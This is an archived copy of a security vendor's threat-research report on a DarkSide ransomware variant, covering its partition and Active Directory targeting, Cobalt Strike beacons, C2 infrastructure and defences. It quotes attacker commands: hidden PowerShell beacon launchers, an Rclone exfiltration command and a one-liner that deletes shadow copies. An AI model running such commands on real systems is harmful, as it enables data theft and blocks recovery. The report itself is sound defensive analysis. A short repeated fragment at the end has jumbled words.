{
	"id": "56a82c00-3449-49cc-bbe8-939db161baed",
	"created_at": "2026-04-06T00:08:48.308972Z",
	"updated_at": "2026-04-10T13:11:41.821938Z",
	"deleted_at": null,
	"sha1_hash": "4e418e297510b14664977451a73814368d6c296e",
	"title": "Newly Discovered Function in DarkSide Ransomware Variant Targets Disk Partitions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 946846,
	"plain_text": "Newly Discovered Function in DarkSide Ransomware Variant\r\nTargets Disk Partitions\r\nPublished: 2021-05-17 · Archived: 2026-04-05 13:03:23 UTC\r\nFortiGuard Labs Threat Research Report\r\nAffected Platforms: Windows\r\nLevel of Risk: HIGH/MEDIUM. This ransomware variant, written by the same criminals that targeted Colonial\r\nPipeline, exhibits the ability to detect and compromise partitioned hard drives, a behavior not seen before.\r\nImpact: MEDIUM. This attack currently appears to be confined to targeted organizations and is not the result of\r\nwidespread wormlike activity.\r\nIntroduction of DarkSide Ransomware\r\nFortiGuard Labs has uncovered additional tactics used by the threat actors that attacked Colonial Pipeline. In this\r\ndifferent DarkSide ransomware variant, FortiGuard Labs researchers uncovered an ability to seek out partition\r\ninformation and compromise multiple disk partitions. \r\nAt the time of discovery, FortiGuard Labs researchers believed the ransomware was seeking out partitions to find\r\npossible hidden partitions setup by systems administrators to hide backup files. But further analysis confirmed an\r\neven more advanced technique. The DarkSide Ransomware variant seeks out partitions on a multi-boot system to\r\nfind additional files to encrypt, thereby causing greater damage and an increased incentive to pay a ransom to\r\nrecover files.\r\nIn this blog the reader will discover:\r\n1. DarkSide ransomware code is efficient and well-constructed, indicating that their cybercriminal\r\norganization includes experienced software engineers\r\n2. The DarkSide ransomware variant (NOT the version used to disrupt Colonial Pipeline operations) is\r\nadvanced in nature and was observed to seek out partitions in a multi-boot environment to create further\r\ndamage. It also seeks out the domain controller and connects to its active directory via LDAP anonymous\r\nauthentication.\r\n3. Additional insight on the files used by, and associated with, DarkSide was uncovered by the FortiGuard\r\nIncident Response team during recent engagements.\r\n4. The use of a well-known (to threat researchers) bulletproof host that has been used by a wide variety of\r\nmalicious actors for numerous nefarious activities over the years, including the 2016 DNC elections attack\r\nin the United States.\r\nExpanded Analysis of the DarkSide Ransomware Variant by FortiGuard Labs\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 1 of 13\n\nFortiGuard Labs encountered novel techniques in this DarkSide ransomware variant cybercriminal organization\r\nnot seen before in ransomware. The DarkSide ransomware variant[1] was obtained through our partnership with\r\nCTA. \r\nThis ransomware sample, unrelated to the Colonial Pipeline campaign, was programmed efficiently with very\r\nlittle wasted space, and compiler bloat has been kept to a minimum, which is unusual for most malware. While the\r\nfile size is relatively small for malware (57,856 bytes), it can deliver a much-larger-than-expected payload. The\r\nfollowing section will look closer at two of the more unique functions that this DarkSide variant carries out. One\r\ndeals with Active Directory and the other is concerned with partitions. \r\nMalicious actors know that Active Directory is basically a goldmine of network information. In this campaign, the\r\nDarkSide group included an Active Directory attack in their ransomware software. To accomplish this, it first\r\nattempts to look for domain controllers. \r\nFigure 1: finding domain controllers\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 2 of 13\n\nIf any domain controllers are found, it will then use them to try and connect to the Active Directory. However,\r\nbecause permissions are usually required to do this, the DarkSide ransomware variant attempts to use LDAP to\r\nauthenticate anonymously. Note the use of a null password and a null username in the following sequence:\r\nFigure 2: LDAP anonymous authentication\r\nThis DarkSide ransomware variant may then use COM to interface with Active Directory itself. If successful, the\r\nmalware attempts to delete certain variables, such as defaultNamingContext and dnsHostName. \r\nAfter issuing Active Directory queries, the ransomware then attempts to encrypt files in network shares found in\r\nthis section of the code. Note that DarkSide makes a point to avoid shares named C$ and ADMIN$, and also first\r\nchecks to see if a share is writeable before trying to encrypt files in it. C$ and ADMIN$ are default and known\r\nadmin shares, which are supposed to only be accessible by members of the Administrators group or the Backup\r\nOperators group if they have not been disabled or reconfigured. It seems likely that DarkSide avoids these shares\r\non the chance that it may not be running in the context of an Administrator and attempts to access them could\r\npotentially trigger an alert.\r\nA more unique operation was found elsewhere. In a similar fashion to Petya (also known as NotPetya)\r\nransomware, DarkSide also scans the hard drive to perform additional actions. In the case of Petya, the MBR\r\n(Master Boot Record) was infected so that when a user turned on the computer it booted a ransom note straight\r\nfrom the MBR and essentially rendered the computer useless. (For more information on how this was done, please\r\nrefer to our Petya blog here.) In the case of the DarkSide ransomware, however, it scans the drive to see if it is a\r\nmulti-boot system to find additional volumes/partitions to try and encrypt their files as well. (NOTE: While the\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 3 of 13\n\ntechnical definitions of partition and volume are different, the two will be used interchangeably for the purposes of\r\nthis blog.)\r\nFigure 3: Loop through volumes\r\nAfter the malware finds a targeted drive type, it checks the version of Windows it is running on. For systems\r\nrunning Windows 7 and above, the malware looks for volumes with a bootmgr file in it. The bootmgr file may be\r\nfound in the root of the C:\\ drive or it may be stored in another volume.\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 4 of 13\n\nFigure 4: Newer OS\r\nFor systems older than Windows 7, DarkSide chooses a different approach. It calls the DeviceIoControl API using\r\nthe IOCTL_DISK_GET_PARTITION_INFO_EX control code. (Incidentally, Petya also used this control code.\r\nSome of the similarities between the two attacks are quite interesting.) According to Microsoft, this control code\r\nretrieves extended information about the type, size, and nature of a disk partition. This DarkSide ransomware\r\nvariant, however, uses the results in a different manner.\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 5 of 13\n\nFigure 5: Partitions\r\nIf the partition style it finds is an MBR (Master Boot Record), it will go ahead and check to see if this partition is\r\nbootable. If not, then it will try to mount the partition. This appears to be a programming bug, as bootable\r\npartitions may contain databases and other relevant data. Perhaps DarkSide is looking to only encrypt files inside\r\ndata partitions rather than those found in bootable partitions.\r\nFigure 6: Possible MBR bug\r\nHowever, if the partition style is GPT (GUID [Globally Unique Identifier] Partition Table), DarkSide takes\r\nanother step. The first entry in a GUID partition’s format is the partition’s type, and as expected, it is defined by a\r\nGUID.\r\nPartition Definition GUID\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 6 of 13\n\nEFI System {C12A7328-F81F-11D2-BA4B-00A0C93EC93B}\r\nWindows Recovery Environment { DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}\r\nFigure 7: Partition types\r\nIf either of these GUIDs match the results from the call to the DeviceIoControl API, then DarkSide skips these\r\npartitions and moves on to the next one. (Unlike Petya, it appears that DarkSide at least wants to leave the infected\r\nmachines in a semi-recoverable state for obvious reasons.) At this point (whether an MBR data partition or a non-excluded GPT volume), DarkSide goes ahead and attempts to mount the partition using the\r\nSetVolumeMountPointW API. Once a volume is successfully mounted, DarkSide then attempts to encrypt the files\r\ncontained within.\r\nAs far as we have been able to determine, these actions are new to the ransomware scene. As a result, the global\r\ncyber security community may not be properly protected against this attack strategy. \r\nAdditional Files Observed Being Used in an Alternate DarkSide Ransomware\r\nCampaign\r\nWhile the above sample came from trusted partners, the FortiGuard Incident Response team has observed other\r\nactivities related to the DarkSide Cybercriminals. The details gained from these observations shed additional light\r\non the tactics and techniques used by the DarkSide cybercriminals. For example, they provide further insight into\r\ntheir usage of an SMB beacon, an HTTPS beacon, an exfiltration component using a command line tool named\r\nRclone, WMI activity, and malware execution.\r\nSMB and HTTPS Beacon\r\nFurther analysis of an SMB beacon used by DarkSide reveals Cobalt Strike PowerShell code. Here, the\r\nenvironment variable %COMSPEC% has the value of “C:\\Windows\\System32\\cmd.exe” and provides command\r\nline arguments, unbeknownst to the user and to evade detection, that start the PowerShell application minimized\r\nwithout creating a new window. The encoded PowerShell code is the Cobalt Strike SMB Beacon payload:\r\n%COMPSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand \u003cEncoded SMB Beacon\r\npayload\u003e\r\nThe decoded PowerShell command creates a named pipe, “\\\\.\\pipe\\UIA_PIPE_”, in its SMB beacon\r\ncommunication. The pipe is bi-directional; both server and client processes can read from and write to the pipe:\r\nCreateNamedPipeA(\\\\.\\pipe\\UIA_PIPE_xxxx, 3, 6, 1, 4b000, 4b000, 0, 0)\r\nAnother finding is the discovery of an HTTPs Beacon. The following PowerShell command runs the HTTPS\r\nBEACON payload on hosts that connect outbound to the malware’s Command and Control (C2) server located at\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 7 of 13\n\nIP (185.180.197[.]86) . It does this using the command InternetConnectA(server:tailgatethenation.com, port: 443,\r\n). \r\n%COMPSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand \u003cEncoded HTTPS Beacon\r\npayload\u003e\r\nThis C2 IP address, 185.180.197[.]86, was very active in 2019, and was observed again in 2021-04-19 after a long\r\npause. We do not know why this IP address remained dormant for over a year.\r\nFigure 11. Historical traffic from 2019 – 2021 for 185.180.197[.]86\r\nThe passive DNS entries for the C2 IP 185[.]180[.]197[.]86 are listed below. Other threat researchers have\r\nreported this IP being used by DarkSide, and this gives some insight into the kinds of data it is used for. As can be\r\nseen, prior to its use as a C2 server for ransomware, it was primarily used for pornography.\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 8 of 13\n\nFigure 12. Historical passive DNS entries for 185.180.197[.]86\r\nFurther Examination of the DarkSide Ransomware C2: IP\r\nUpon further examination, the 185[.]180[.]197[.]86 IP address was found to be co-located in the United States\r\nwith KingServers B.V. KingServers has been classified as a bulletproof host by the infosec community, and\r\nalthough based in the Netherlands, it has ties to Russia, where DarkSide is located.\r\nBulletproof hosting is a service provided by some hosting firms that provides considerable leniency in the kinds of\r\nmaterial uploaded and distributed by their customers, or in the activities they can engage in without getting taken\r\ndown. KingServers is a hosting site well known to the InfoSec community and has been covered extensively by\r\nsecurity journalist Brian Krebs among others. Specifically, its hosting service was used in several notable attacks,\r\nsuch as attacks on an India-based IT outsourcing firm to perpetrate gift card fraud, as well as for the 2016 DNC\r\nattacks in the United States.\r\nReview of observed telemetry over a 30-day period highlights a concentration of traffic from U.S. based machines\r\nconnecting to the DarkSide C2 server, with the United States at the top (60%), followed by the Netherlands (9%),\r\nSingapore (8%), Brazil (4%), and Great Britain (4%). This corresponds to reports that Darkside netted at least $60\r\nmillion in its first seven months, with $46 million coming in the first three months of this year.\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 9 of 13\n\nFigure 13. Traffic to 185[.]180[.]197[.]86 over 30 days\r\nFigure 14. Port 443 Traffic to 185.180.197[.]86 over 30 days\r\nThe Darkside ransomware attackers established command and control primarily with an RDP client running over\r\nPort 443, routed through TOR. Connections between Port 443 and the C2 server 185[.]180[.]197[.]86:443 over a\r\n30-day period reveal a concentration of traffic from U.S. based machines, with the United States at the top (82%),\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 10 of 13\n\nfollowed by the Netherlands (9%), with Great Britain, Iceland, and the Philippines/Switzerland (tied) rounding out\r\nthe top 5 pings.\r\nExfiltration\r\nA Windows task discovered during our analysis shows how data exfiltration was initiated. It was performed using\r\nRclone, a command line tool used to sync files and directories between a local system and cloud storage. In this\r\ncase, the Rclone binary was renamed to evade detection and dropped into the directory “C:\\Users\\Public\\”. The\r\nthreat actor was looking to exfiltrate files created in the last year in the file formats of .xls, .xlsx, .doc, .docx, and\r\n.pdf.\r\nRclone copy \u003csource\u003e \u003cdest\u003e –max-age 1y –ignore-existing –drive-chunk-size 512M –buffer-size=4G –transfers\r\n20 –checkers 40 –include *.{xls,xlsx,doc,docx,pdf}\r\nWMI Activity\r\nTo thwart data recovery, the ransomware payload attempted to access the Windows Management Instrumentation\r\n(WMI) service. \r\nFurther compounding the impact of the attack, the de-obfuscated PowerShell command was discovered:\r\n“Get-WmiObject W32_Shadowcopy | ForEach-Object {$_.Delete();}” \r\nIt used the PowerShell cmdlet Get-WmiObject to delete all the Volume Shadow copies to thwart data recovery.\r\nMalware Execution\r\nPsExec, a remote administration tool, was seen running the main malware payload (.exe). The ransomware\r\npayload (.dll) was hosted on a shared folder, and a batch script was run to copy the payload to the host’s\r\nC:\\Users\\Public directory. This payload was executed using rundll32, and a service was created to maintain\r\npersistence. There were multiple encryption routines within the worker process, and the encryption routines were\r\ncalled directly to perform encryption and create ransomware artifacts.\r\nDarkSide Ransmware Conclusion\r\nThis blog highlights that the threat actors behind DarkSide are not your average ransomware as a service group.\r\nDue to the sophistication of its attacks and code, it is also unlikely the mastermind of one person. The level of\r\ndetail, effort, planning and time that the group has undertaken, not only creating the ransomware itself, but taking\r\nthe time to note what data was stolen, the amount of data, what it contained (as well as how much data in GB),\r\nand the taken to organize and shame victims all highlight that this is the work of an organization with considerable\r\nresources and time.\r\nFor introductory insights into DarkSide relating to the Colonial Pipeline attack, please refer to our\r\nprevious blog and Threat Signal reports.\r\nFortinet Protections\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 11 of 13\n\nFortiGuard Labs\r\nFortiGuard Labs has the following AV signatures in place for publicly available DarkSide Ransomware and\r\nassociated campaign samples as:\r\nPossibleThreat\r\nRiskware/Agent\r\nRiskware/PCH\r\nRiskware/PowerTool\r\nRiskware/RemoteUtilities\r\nRiskware/TorTool\r\nW32/DarkSide.B!tr.ransom\r\nW32/Filecoder.ODE!tr.ransom\r\nW32/Filecoder_DarkSide.A!tr\r\nW32/Filecoder_DarkSide.B!tr\r\nW32/GenKryptik.FBOV!tr\r\nW32/Packed.OBSIDIUM.BV!tr\r\nW64/Kryptik.BVR!tr\r\nFortiGuard Labs has the following IPS signatures in place for Cobalt Strike Beacon Activity as:\r\nBackdoor.Cobalt.Strike.Beacon\r\nFor TOR (darkweb) activity, FortiGuard Labs Application Control signatures detect all TOR-related activity.\r\nFortiEDR\r\nAll related IOCs have been added to our Cloud intelligence and will be blocked if executed on customer systems.\r\nFortiEDR detects and blocks the WMI service access operation cited above, as follows:\r\nFortiEDR also detects and blocks “Rundll32.exe”, which is used to execute the ransomware worker process.\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 12 of 13\n\nWebFiltering\r\nAll available network IOCs are blocked by the client.\r\nOther Mitigations\r\nDue to the ease of disruption and potential for damage to daily operations, reputation, and the unwanted release of\r\npersonally identifiable information (PII), etc., it is essential to keep all AV and IPS signatures up to date.\r\nIt is also vital to ensure that all known vendor vulnerabilities within an organization are addressed and updated to\r\nprotect against attackers establishing a foothold within a network.\r\nSince most ransomware attacks originate with a compromised end user, organizations are also encouraged to\r\nconduct ongoing training sessions to educate and inform personnel about the latest phishing/spearphishing attacks.\r\nThey also need to encourage employees to never open attachments from someone they don't know and always\r\ntreat emails from unrecognized/untrusted senders with caution. This can be accomplished through regular training\r\nsessions and impromptu tests using predetermined templates by an organizations' internal security department.\r\nSimple user awareness training on how to spot emails with malicious attachments or links could also help prevent\r\ninitial access into the network.\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard\r\nSecurity Subscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda\r\n(TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans\r\nprogram.Learn more about FortiGuard Labs global threat intelligence and research and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\n1 SHA256:0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9)\r\nSource: https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 13 of 13\n\nattacks in the United Review of observed States. telemetry over a 30-day period highlights a concentration of traffic from U.S. based machines\nconnecting to the DarkSide C2 server, with the United States at the top (60%), followed by the Netherlands (9%),\nSingapore (8%), Brazil (4%), and Great Britain (4%). This corresponds to reports that Darkside netted at least $60\nmillion in its first seven months, with $46 million coming in the first three months of this year. \n   Page 9 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions"
	],
	"report_names": [
		"newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions"
	],
	"threat_actors": [],
	"ts_created_at": 1775434128,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e418e297510b14664977451a73814368d6c296e.pdf",
		"text": "https://archive.orkl.eu/4e418e297510b14664977451a73814368d6c296e.txt",
		"img": "https://archive.orkl.eu/4e418e297510b14664977451a73814368d6c296e.jpg"
	}
}